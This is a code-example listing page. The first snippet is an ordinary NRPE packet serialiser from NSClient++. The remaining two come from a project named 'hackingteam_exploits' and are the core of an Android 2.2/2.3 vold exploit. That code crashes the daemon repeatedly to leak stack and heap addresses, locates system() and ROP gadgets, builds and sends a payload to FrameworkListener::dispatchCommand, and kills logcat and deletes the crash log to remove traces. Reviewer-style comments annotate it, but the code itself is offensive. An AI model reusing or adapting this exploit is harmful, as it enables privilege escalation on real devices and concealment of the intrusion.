コード例 #1
ファイル: packet.hpp プロジェクト: lazyfrosch/nscp
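		/// Serialises this packet into a freshly allocated wire buffer and returns it.
		///
		/// The buffer is stored in tmpBuffer (declared outside this view) and is
		/// released by the next call to create_buffer(), so the returned pointer
		/// must not be used after a later call on the same object.
		///
		/// @return pointer to get_packet_length(payload_length_) bytes of packet data,
		///         followed by one extra zero byte.
		/// @throws nrpe::nrpe_exception if the payload does not fit the payload field.
		const char* create_buffer() {
			// Validate the payload before allocating or writing anything. The
			// comparison is ">=", so the payload must be strictly shorter than the
			// field -- presumably to leave room for a terminator; confirm against
			// update_payload().
			if (payload_.length() >= payload_length_)
				throw nrpe::nrpe_exception("To much data cant create return packet (truncate data)");

			const unsigned int packet_length = nrpe::length::get_packet_length(payload_length_);

			// Allocate the replacement first and only then release the old buffer.
			// The original deleted tmpBuffer before calling new[]; if that
			// allocation threw, tmpBuffer was left pointing at freed memory and any
			// later delete[] or read through it would be a double free / use after free.
			char *fresh = new char[packet_length+1];
			delete [] tmpBuffer;
			tmpBuffer = fresh;
			memset(tmpBuffer, 0, packet_length+1);

			// Fill in the header fields, each passed through swap_bytes::hton.
			nrpe::data::packet *p = reinterpret_cast<nrpe::data::packet*>(tmpBuffer);
			p->result_code = swap_bytes::hton<int16_t>(result_);
			p->packet_type = swap_bytes::hton<int16_t>(type_);
			p->packet_version = swap_bytes::hton<int16_t>(version_);
			update_payload(p, payload_);

			// The checksum is computed over the packet with its own CRC field set
			// to zero; the converted value is also cached in crc32_.
			p->crc32_value = 0;
			crc32_ = p->crc32_value = swap_bytes::hton<u_int32_t>(calculate_crc32(tmpBuffer, packet_length));
			return tmpBuffer;
		}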
コード例 #2
ファイル: test8.c プロジェクト: 5weet5/hackingteam_exploits
// Entry point of a proof-of-concept aimed at the Android vold daemon.
// It only proceeds on devices whose release string contains "2.2" or "2.3",
// repeatedly crashes vold to learn addresses, then builds a payload and
// prints it. All state (heap_*, stack_addr, jumpsz, system_ptr, ...) lives in
// globals that are set by helpers defined outside this view.
//
// Defender-relevant side effects visible here: repeated vold crashes, a
// logcat child process that is killed at the end, and a crash log file that
// is deleted once the addresses have been read from it.
int main(int argc, char **argv, char **env)
{
  // i and ok are never used in this function.
  uint32_t i = 0, ok = 0;
  struct stat st;
  char version_release[1024];
  int tries=0;
  int payload_size=0;

  // Derive heap_base_addr from the size of the file named by `vold`.
  // NOTE(review): the return value of stat() is ignored, so st is read
  // uninitialised if the call fails.
  stat(vold, &st);
  heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000;

  __system_property_get("ro.build.version.release", version_release);

  // Version gate: strstr() is a substring match, not an exact version
  // comparison. Anything other than a 2.2/2.3 match exits immediately.
  if (strstr(version_release, "2.2")) {
    heap_offset = 0x108;
    printf("[+] Found a Froyo ! 0x%08x\n", heap_offset);
  } else if (strstr(version_release, "2.3")) {
    heap_offset = 0x118;
    printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset);
  } else {
    printf("[-] Not a 2.2/2.3 Android ...\n");
    exit(-1);
  }


  heap_addr = 0xffffff;

  // The same buffer is reused for the build fingerprint; a fingerprint that
  // starts with "samsung" sets the `samsung` flag (its effect is not shown here).
  __system_property_get("ro.build.fingerprint", version_release);
  if(!strncmp(version_release, "samsung", 7)) {
    printf("[+] Found a Samsung, running Samsung mode\n");
    samsung = 1;
  }


  // Resolve the address of the symbol "system" in this process and take its
  // upper 12 bits as the assumed libc base.
  system_ptr = (uint32_t) find_symbol("system");
  libc_base = system_ptr & 0xfff00000;

  // check_addr() is defined elsewhere; -1 is treated as "address unusable".
  if (check_addr(system_ptr) == -1) {
    printf("[-] system_ptr contains forbidden bytes!\n");
    exit(-1);
  }

  // Walk the zero-terminated allbuffsz table until checkcrash() reports that
  // vold went down. Each iteration is one crash attempt against the daemon.
  tries = 0;
  printf("[*] Step 1: causing the first vold crash...\n");
  while(buffsz=allbuffsz[tries]) {
    if(checkcrash()) {
      printf("[+] Vold crashed using %d arguments!\n", buffsz);
      break;
    }
    tries++;
  }

  // buffsz == 0 means the table was exhausted without a crash; the message
  // shows the author treats that as the sign of a patched vold.
  if(!buffsz) {
    printf("[-] Unable to crash vold process. Fixed vold???\n");
    exit(-1);
  }

  // Up to two rounds of heap_oracle() + find_stack_addr(). 0x41414141 is
  // compared against as the "not found" value of stack_addr -- presumably set
  // by a helper outside this view; confirm there.
  for (tries = 0; tries < 2; tries++) {
    heap_oracle();
    printf("\n[*] Step 2: causing the second vold crash\n");
    find_stack_addr();

    if (stack_addr != 0x41414141 && jumpsz) {
      printf("[+] stack_addr found: 0x%08x, padding: 0x%04x\n", stack_addr, jumpsz);
      break;
    }
  }

  if (stack_addr == 0x41414141 || !jumpsz) {
    printf("[-] Unable to generate stack_addr!\n\n");
    exit(-1);
  }

  // If stack_addr is rejected only because of its low byte, retry once with
  // the address moved up by 4 and record that shift in `adjust`.
  if (check_addr(stack_addr) == -1) {
    if(bad_byte(stack_addr & 0xff)) {
      stack_addr += 4;
      adjust = 4;
      if (check_addr(stack_addr) == -1) {
	printf("[-] stack_addr contains forbidden bytes!\n");
	exit(-1);
      }
    }
    else {
      printf("[-] stack_addr contains forbidden bytes!\n");
      exit(-1);
    }
  }

  // Hard upper bound on the padding the rest of the program will accept.
  if (jumpsz > 108 + 12) {
    printf("[-] Too much padding is needed!\n");
    exit(-1);
  }

  // When check_libc_base() succeeds, system_ptr is rebuilt from libc_base plus
  // the low 20 bits of the previously resolved address, then re-validated.
  if(check_libc_base()) {
    system_ptr = libc_base + (system_ptr & 0x000fffff);
    printf("[*] Pointer to system function found at 0x%08x ...\n", system_ptr);

    if (check_addr(system_ptr) == -1) {
      printf("[-] Pointer to system function contains forbidden bytes!\n");
      exit(-1);
    }
  }

  // Cleanup: the logcat helper process is killed and the crash log file is
  // removed, so that file will not be present on disk afterwards.
  kill(logcat_pid, SIGKILL);
  unlink(crashlog);

  printf("\n[*] Researching ROP gadgets ...\n");
  find_rop_gadgets();
  printf("[+] first gadget found at 0x%08x, second gadget found at 0x%08x\n", stack_pivot, pop_r0);

  // update_payload() returns the payload size; the last visible step prints it.
  payload_size = update_payload();
  
  printf("\n[*] Payload generated: %d bytes\n", payload_size);
  print_payload(payload_size);

  return 0;
}
コード例 #3
ファイル: test8.c プロジェクト: 5weet5/hackingteam_exploits
// Regenerates the payload and passes its size to send_payload(), returning
// whatever send_payload() returns. According to the original author's note
// the target is the FrameworkListener::dispatchCommand method in libsysutils.
// Both helpers are defined elsewhere in the file.
int do_fault()
{
  // update_payload() is assigned to an int where main() calls it as well.
  int payload_len = update_payload();

  return send_payload(payload_len);
}